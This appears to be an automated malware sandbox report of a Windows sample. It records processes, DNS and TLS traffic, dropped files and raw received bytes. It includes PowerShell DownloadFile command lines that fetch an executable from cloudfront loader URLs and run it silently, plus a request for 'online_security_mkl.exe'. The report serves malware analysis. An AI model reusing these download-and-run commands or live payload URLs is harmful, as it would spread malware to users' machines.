Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 10, 2024, 10 a.m. | June 10, 2024, 10:07 a.m. |
-
-
-
powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001','stat')"
2756 -
powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001','i0.exe')"
2864 -
-
i0.tmp "C:\Users\test22\AppData\Local\Temp\is-HMERC.tmp\i0.tmp" /SL5="$90178,26775516,899584,C:\Users\test22\AppData\Local\Temp\i0.exe" /verysilent /sub=1001
3056
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.67.53.27 |
cdn-edge-node.com | 104.21.11.117 | |
d22hce23hy1ej9.cloudfront.net | 13.225.110.70 | |
d2lvl7wmj7b91p.cloudfront.net | 54.230.169.96 | |
adblock2024.shop | 104.21.43.83 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49172 13.225.110.102:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49168 13.225.110.102:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49163 54.230.169.11:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49173 172.67.165.254:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=cdn-edge-node.com | a9:8d:72:17:ad:81:a1:43:81:37:a3:7e:bd:5d:9c:03:b8:8b:07:ff |
TLSv1 192.168.56.101:49183 172.67.176.247:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=adblock2024.shop | f6:53:16:b6:98:89:7a:ae:57:00:89:be:e1:b6:81:59:8e:db:ed:ab |
section | .ndata |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn-edge-node.com/online_security_mkl.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET https://d2lvl7wmj7b91p.cloudfront.net/load/load.php?c=1001 |
request | GET https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001 |
request | GET https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001 |
request | GET https://cdn-edge-node.com/online_security_mkl.exe |
file | C:\Users\test22\AppData\Local\Temp\nscF137.tmp\jan.bat |
file | C:\Users\test22\AppData\Local\Temp\nscF137.tmp\INetC.dll |
file | C:\Users\test22\AppData\Local\Temp\i0.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001','i0.exe')" |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001','stat')" |
file | C:\Users\test22\AppData\Local\Temp\i0.exe |
file | C:\Users\test22\AppData\Local\Temp\i0.exe |
file | C:\Users\test22\AppData\Local\Temp\is-HMERC.tmp\i0.tmp |
file | C:\Users\test22\AppData\Local\Temp\nscF137.tmp\INetC.dll |
Data received | [ |
Data received | Wo´T ×at õªî¿´Ñ4FîAèDOWNGRD ¦´ÙäOÊèÿ9ÌZ«ÀÒZ»Pû72`)3_À ÿ |
Data received | b |
Data received | 6`¨^\ ²/Yöù%CçiRáqãØ- NoöÈIÙ¶óV®+¶tëÏû&ãº.j;XGVÿ% pSÚtÃgh:ß@ZJNÏC;çVÖ pËRî{}®:ç¼1ùEöÂ`ÏY+Ì4Gß¹ÞemÏ,¦¦çÞ I|fN£:m©µî4.º ¸3ßGë±k%ÙÎÑEF2pÞIC ¶ls»dêaA¬ÉÔTß/Ç"²&ÌYThü¾*/ÄUu@` U9 £ð0í0Uÿ0ÿ0Uÿ0U_ ߪ×0+8¢¸mJò0U#0¿_·ÑÎÝô[U¬Üשç0O+C0A0+0http://o.ss2.us/0!+0http://x.ss2.us/x.cer0&U00 http://s.ss2.us/r.crl0U 00U 0 *H÷ #ãWÊ}éyLñUýÌSn>GßÆUò²6íSÄ]4(k¾ÇUügêË?²3ÍXøø/õ`ÔÎñÁݧuO¹mÞ÷º~@,íÁê»v3w SÝd«'ñiÕM^®ô¡Ãu§XD-ò<p¬ºi¶w1^,ü :Giðy_ôT¤^x`'ÎÂwÿ#Sw]ºÿêYçÛϯï$5zÆ}ö?ßõrTá©Y{¿R.F² dvHÓØyènVÌ®,×8äÊ [ÿ°¨4IßV©÷°_í3íG·0]ô |
Data received | K |
Data received | G AñÃb iÅÐAë°ÃÛ[GAór£Å<÷Ýñ¤îH>X!½ZÛÖ$^ÊòdÐ#åæ)(üg/eL1 ¼ôWødFpÏ^Òn%<#LMÜp¶Þ9êc³ìyÝà÷_óçxZñÜ ¾¡S±â)Ë£ç VÆ®4xÓ3?³bÿVÐ HÛÉ$îù¤BP½èø{ü5m$åMJÀ-%/jARHx! hè ÚIÑ¢¥wY~ ,ÒéM@Ã>Såñ¹o&*Ù³ÆWc@$U¯6Q+èvɺyÈ:w¶ºtáð6ÙóTÁi{µ0½å½>¨À;ÍÛ)¯PX¶:âlÔ»Ø]«ëº:LvÑÈCóø¸ä×°\¶Èï¾âüÈk] |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | ûÉÚÿ!ê4X$Ðü xXd` ,fEÌpLôdÉÊèæ.¤Àø%Ý;ع]².` |
Data received | |
Data received | ¨ ¯Þ^[Ãxf³n@@ݾ·ýDX°WäZ¶} ÕÛ2½ý^KÈ|W´1±]~Ç,>úðÂ|A¬¯cvtùA]KáÕíB@èR:^HDV Á²¥Ï$EÀòôƤ%\<N½Ã¤,ÕxÍYÏ.ØüT²9K¨EI¡qºÀaAØý²¹Ð gmðI¾Óêö6â¼ìðÙ«±Ò¬Zòs}¶_ «xç×ä,å*áÓùaISõ<ݶdð ©Of«2çy>îÊg"u!ÿ¡Üc,È Â Â w¸R+.£-È[V {»`QiÐU=ìíÌ«¸ ±zïãÖÃõIÊ.hs*Ò?¸ BL~¦Hõس»á^0³ù¥nI O&bãm ôµÝ_H)%÷Ú'ÒRëÐ ï6É7Å@)8ÎóF¶¼UpÇ¥Cå*¬ò´Å¥CyÉðÙÊÊ^ðÔijÀµ¿ |
Data received | Wtÿ£®èà@ý/`v å$³Ê ðDOWNGRD zÆ¢ÅåYt !ÏÁM °O%e7ú%ØÀ ÿ |
Data received | G AQÉËy]L1=)õ_&QPLÓµÑF©óËÚâÊÝ௺<rÉ+©`ç \¾¼ÐN1ôB Xé }> T ò&eYÀ»?U¡WÍ~©Þ§«uHYdÐÞ3\ ¤8UOæ¤üàl«íë5F«ò7s7Ϋ!ä ¾EKJÐUÚ¨ ³ú!d]oMíéË ßBؽ7¹Éö]j'íöojp¿âÚ# ÍÛÙ³¹ö=®9ÛHqû 1-@ì¸Òe(õ£ýML su`KàpÏêØu ²½õ[ ô貺` PBÁ¿h¼V£ìó;ÍO^:rÍnmàÖÓí©æV'ÄäÕd7_xi·îaÓGXç¶ÍJî%öCW |
Data received | ÏCl?wÁ¯Ôðô!¢ü~eYæ üj¹ªençñó.yÕÓ |
Data received | à |
Data received | Ï|ÈôNîòÕd#r °=\l9Ìè¢ÿÍìË鵿ºÁ<`Ã*®UÜßFúÕë(©[6 2nxA]ssã¡ÚHDt9ÿq ®/Ùj 4¾yÓ¢òY@¥ÅÔߧ|lÙFN7¿.;0ù¦f»ÐÐyÝZF¼ñ^ÉøcOJJ¤úÅ%¼¡EúbfL^·C¨ÍUë[Eå¨àîARºvÆÒQ&}ëH.K}7zÀà ]N\Ï{ÞeÑ9vñ ìvöàuj(Ó°uRõ1wä TWÌ|.fk| ¼Íë\,<Ô68ÕB#_ø°\â¦×<J:Åò®-©,ëpèYê%Q_UÐl° ®ÖTõävUïù³~Wt>Þ©D×è'ûù(_ë±È¤)ð,¿2#Àñ¢Q_×p`¢ôySä5N#IãDÆËåïL~§UÀ°ÈVTߢê OÖ3@xFÚê¿Hïðº'¿O}ÐýVÝU¶$l[B6"-°Ìí'½¸CújE𧹱!hICí@`ªôÂíä |
Data received | WffQB(±§p<¬kw×ä~¸9Üg³aÀDOWNGRD Ë*=vñ R=ÇçZe)Q5<Þß®Àd6 o7ÇÀ ÿ |
Data received | |
Data received | G Aø~ §&\ét]¬¯FË¥LÜaÕ®DæOs¯ ÏXÒÃé þ6Í¡h'=sÀmÀþõ#õbÔÒªÖ ¯×tн+ ÃesvyXvA£E±Ù¥)ͱHÐ0?1ÍëlMúmïMèöd»H¿Èsm6꯻D't['ès]¿³°°dU"%_=`1Õ*YEnDu ÑgpºóãùwPö %¥Æ8ÿÒºÊoÓÍo?×I8ÎJ,zpENeùí<àÉôâ®ú!³sO£¬²ò£ôMÆGÞ0aH\]ûÝÊô_³ýäwXð~ýzÃêð°×þR«qiàµÅnvûj_õ%:D|+¥ZPgZ"N#÷ãâ]¹¥ |
Data received | £q¶ä¬{ÇI@7@cÿLí%Ø+#¢Ý2?]¼ç®¿6hæ# |
Data received | p |
Data received | ³Ü×V[Öök¿OLÍ÷m!C«PcnÀ»ÿkl ;JÂ?;¨[î/Ó}O¢ZW£]» ó:¿9AÎI"ºlU«ÈHP^ðĦ EÀ9äã$2 춴¥\°éË6«Ù,Á®E ¶ÈA2\ÔæOº÷ÂOuкÁVm=!±Ü£ª&w¯V×êPÆæ§! ¨~P@Y'7Ù-(ÇVæ[aZGÍ&@³ngØ·Th¤øvQµz£Fø#f&\zà,N3=?ÝØçÐùÿøùUìÁa.üè¼$YK4eè%<×?2ò WZ¯ë¥Ìrõ=¥ìö6¦%óÒ3}/]H¹áó¸þõØÝcÊão$×VB«r+?5ßsò8Aañ®béb¢D\¾NGÐO4ÏÊóQlШº×#`Ò³àÂ?0ÿÞ¸¨üêêC_Q÷.åM`~;Rµz" ÙÓ(ÓÏh_´sÿ¨è§£|köyæü~°4(+7Ï êÖÞxt§ºËûå±OÛ-C@ªÙ}µz°fµ]¹ ¥7¡±QzÞTzútè&i¯SE«ÃF oi5I~Ùä«tã\^ 5Àaè Ï´BùZ.½Í;KÚª¡+¤Ã¨ï-nòÎÜ»aj£Jcª¶%Óêò¹zÛÞÃ¥êN¿¹ö®ï¡Ì3n&T+Ýí Iõì&ÍܶÀJ;YïD`IíLâUÿ%| ãSÎðkO¡ðÜÚ¢R+ðá+ææY]²XHHæy.ÞQwôøV±ûúbØ£P5ñLù[½!#ÚO;Ìvl"ëNðQ©H¹þFMKÞîrGÃsI{âW{Q#lÀ«c/ê36¡êg³clÒ¿¼FmP}ßú·²8Ú¬cë@g:?$\r¡¸ë4¨Ã¥¯$Z*Úù>ÍT°bÔ =ßç}'}[]xmW=ðãÕ7ºç9"TeÑMG"ÈÇ/ý: ù=!ü¤¦éJVÂÄDz²;À+$üUß7ïÛ¥v.â_8ìJÅ^±äDØ5ʧû XϪ¹Ý±`«¡ú¯`Éêm¹"9»¢H´f[Z$U|+°÷øæDòð³ÚÏåÝÒæ-M¨|Í®ÆîqÀÔ RóïØê- R°\>¼)Ðxgá3ª³=¬ ÉçTYMÏ æ¥®$Ìõ82(&Äá/áç IB¸[/©Ë(öóOÆ*Ò6B¯>,x¼%O@¥i\¢hÁ<5n-qÿ;üL»·9' tºú.d=Ïf·2øÂ8|Aí3ßKÎ$ GèpôQ ¼D-´ÀÌw¶×9ïtïw!ê<KODý{±³k¸¯Û3skÚ[SÆø_'oËê ënF70:W&,@s3°6Àtw Ф(Ðnv ù3¼ ]ìIOgq¦L®Cxl<¾¸¹6S[÷+l#îs¬#¿¤2ñÕú5 +sf`hØHÍùs÷héðÛã¢p¦Kì¬VÁjë vIN« GéÌ£14ØÖi'Ä °áÄàepÌèMNÝ ¯n9§F.·qvßnyôZJ]D@Þº³G°Iío;+1K¦®¾ðò6{NbÓù©3¬ÎI2Ð:WIÅ£EAaÞuÏ?iri:¾ |
Data received | û7˱³¿åê/8(nnE Qû¹Á/{öYiµÄ2g_¶£Üé/Úúï9òÈHÄÏ~V®ÿè(,î?ÃPa?u¬»¬¯MÇg§üÂx>*RS ¬ÛªóµXøRÎÁÍG$:® éYÂÑ¡ú½ ø(GvÅ«Úp/øòª«µPtøe¦pÓ$-ΦlYñzý|1âôyKâ þòÆÔ+¶úΰbËE]xâP<·÷ÝPÑmÐãIë§!ü)°{ïÈÇ̰˺ü:Ï{~Ea}<µ W¨öèl=ª@7 16«ób5¬qa Çé|·ÑO¡"(°Úe/enc DîuÝÄðHèaO¸ÍÊíÀ¢¹[VÒdõÝ5©y#¡gÄ´AÇA3Ø;nÝíõâAþ¢þß[£3áT&ꨪ9%~ðÄýJ:'õÆì AÉ5Dÿ)ó7Cèá Îa:Uj½dãȦ¢ÍYkÆPh²¡@Î,Fû2/è[`¯ yùfð6æ ìuµÎðj}Rþfµ7Wá $¸UÜ1tâñN¦XH·y8xM{,zÄÈôs]úN ¿ßM;K ׬»#)tLÓ±''l ^æn©n_íäD£|lo1â6ôS<çÊ ]1Ñ>´?´FÔø#£[ÖMX`4r6ÿºMÓjæôà~ÿ(\cѦ{åÚ³(H¯jX ãªú×+Ñ)ìÝ8ÐÜ4ìamüCUsÛ<!Ñ:y¿,HvÙÕìOkÁqýS"÷þþWÉp~°e`%ÿV¿¤.}[®xÏ *;O{äB1iÐgF!BÆÄBÕ{ ÷׫.4)ïîeQ}Ò9Cz ©ÑÍ$¿ HºÎeÌyÄH×:§ÜlÅ/î9Y0FÁW ßÓ¡ÿÒ÷ͤmç):C¢"9û»3)éÑlêÔRùi¢Î âè/½¨Ü.ç`Zó5¦b4S¶_½î3i|þªj òu¦`#QýrE|°©s¥m°«±Ò'tWl^jhzZ¥Û^ßÆÐ$ë§Äú6æõ©cç+IJûs¿ôîj6Èý/~bìDç)S'áeIÈmÍÚ/é¾_mØx÷\ôGZ¦,(bl ;mÑ·}}ãMËÑAºìøwd"Äg¦³`ê¾Þ"nñïm¦µÒ¦¡ÓCÒß!Ï¤Ù¶É [ÉDdÏ°! ¢o/ªäóÙdØïºÓÆÌ¿÷,µÎ¡äâ;6ûº÷ºè_@i&RøeÇöÃ/KY(d!a°QñZo+×[ØA)èþ![ÏÛk +(uÝùÔQVÎ ´F/¼Hvê¤VWS×|]ÎQ4Q{l9ýo^AÌåBÛ$,\&Á 6¢@©ëGJ¿ÉóÍ&Í& ÍTPAÅÉ©oR pÀWï"·êsa¡×*\Ü-û|cQ$£?´à¦OOü Ý' |